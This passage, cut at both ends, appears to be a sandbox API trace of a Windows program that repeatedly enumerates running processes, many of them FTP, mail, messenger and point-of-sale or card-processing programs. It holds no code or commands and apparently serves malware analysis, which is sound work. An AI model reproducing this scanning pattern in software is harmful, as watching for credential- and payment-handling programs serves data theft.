th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0164.176] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0164.178] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0164.180] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0164.182] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0164.255] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0164.258] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0164.260] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0164.262] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0164.265] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0164.267] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0164.269] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0164.271] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0164.273] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0164.275] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0164.277] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0164.279] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0164.281] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0164.284] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0164.286] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0164.291] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0164.293] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0164.300] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0164.302] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0164.305] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0164.309] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0164.310] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0164.313] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0164.316] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0164.319] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0164.321] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0164.324] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0164.326] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0164.329] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0164.331] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0164.338] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0164.341] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0164.343] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0164.345] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0164.350] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0164.353] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0164.355] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0164.357] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0164.361] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0164.363] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0164.365] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0164.368] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0164.370] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0164.373] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0164.380] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0164.383] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0164.385] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0164.388] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0164.390] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0164.393] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0164.395] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0164.398] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0164.400] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0164.402] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0164.405] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0164.407] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0164.410] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0164.412] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0164.423] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0164.426] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0164.428] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0164.430] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0164.433] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0164.436] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0164.438] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0164.440] CloseHandle (hObject=0x1dfc) returned 1 [0164.441] Sleep (dwMilliseconds=0x64) [0164.555] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ed4 [0164.570] Process32First (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0164.573] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0164.575] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0164.577] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0164.579] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0164.581] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0164.583] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0164.586] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0164.588] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0164.590] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.631] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.633] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0164.636] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.638] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.640] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: 